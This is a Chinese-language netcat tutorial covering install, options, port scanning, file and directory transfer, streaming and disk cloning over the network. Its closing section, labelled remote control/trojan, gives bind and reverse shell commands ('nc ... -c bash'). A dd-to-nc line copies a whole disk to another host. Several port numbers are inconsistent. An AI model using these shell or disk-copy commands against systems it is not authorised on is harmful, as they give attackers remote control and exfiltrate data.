nc 安裝
yum install -y nc
參數:
1 Command Summary: 2 -4 Use IPv4 3 -6 Use IPv6 4 -D Enable the debug socket option 5 -d Detach from stdin #無圖形界面使用后台模式 6 -h This help text #獲取幫助信息 7 -i secs Delay interval for lines sent, ports scanned #延時設置,端口掃描時使用 8 -k Keep inbound sockets open for multiple connects 9 -l Listen mode, for inbound connects #監聽入站信息 10 -n Suppress name/port resolutions #后跟ip地址 11 -p port Specify local port for remote connects 12 -r Randomize remote ports 13 -S Enable the TCP MD5 signature option 14 -s addr Local source address #發送數據源地址 15 -T ToS Set IP Type of Service 16 -C Send CRLF as line-ending 17 -t Answer TELNET negotiation #以TELNET的形式應答入站請求 18 -U Use UNIX domain socket 19 -u UDP mode #使用UDP協議 20 -v Verbose #顯示詳細的輸出內容 21 -w secs Timeout for connects and final net reads #超時秒數 22 -X proto Proxy protocol: "4", "5" (SOCKS) or "connect" 23 -x addr[:port] Specify proxy address and port 24 -z Zero-I/O mode [used for scanning] # I/O 模式,掃描時使用
nc作為客戶端:
1 nc -nvz 10.104.11.107 1-65535 默認探測TCP端口 2 nc -nvzu 10.104.11.107 1-65535 #探測UDP端口
作用:
傳輸文本信息
1 nc -l 9999 #客戶端開啟一個端口 2 netstat -pantu |grep 9999 #查看33端口是否打開 3 nc -l 9999 >ps.txt 監聽到的信息輸出到pa.txt
進行連接:
1 nc -nvv 10.104.11.128 9999 2 ls -l |nc -nv 10.104.11.128 9999 輸出信息打印到10.104.11.128主機
傳輸文件
1 A: nc -l 999>1.html 2 B: nc -nv 10.104.11.128 9999<1.html
或者
1 A:nc -l 9999<ps.txt 2 B: nc -nv 10.104.11.128 9999 >ps.txt
傳輸目錄(先打包)
1 A:tar -cvf - music/|nc -l 9999 2 B:nc -nv 10.104.11.128 9999|tar -xvf -
加密傳輸文件(先加密在傳送再解密)
1 A:nc -l 333|mcrypt --flush -Fbqd(加密) -a rijndael-256 -m ecb >1.mp3 2 B:mcrypt --flush -Fbq(解密) -a rijndael-256 -m ecb <1.mp3 |nc -nv 10.104.11.128 9999
#對稱加密兩邊密碼要相同
流媒體服務
1 A: cat 1.mp3|nc -l 9999 2 B: nc -nv 10.104.11.107|mplayer -vo xll -cache 3000- #指定媒體播放器進行播放
端口掃描
1 nc -nvz 10.104.11.128
遠程克隆硬盤
1 A:nc -l 9999|dd of =/dev/sda 2 B:dd if=/dev/sda |nc -nv 10.104.11.128 9999
遠程控制/木馬
1 正向: 2 A:nc -l 9999 -c bash 3 B:nc 10.104.11.128 4 反向: 5 A:nc -l 9999 6 B:nc 10.104.11.128 9999 -c bash
注:Windows用戶把bash改成cmd
缺點:缺乏加密與身份認證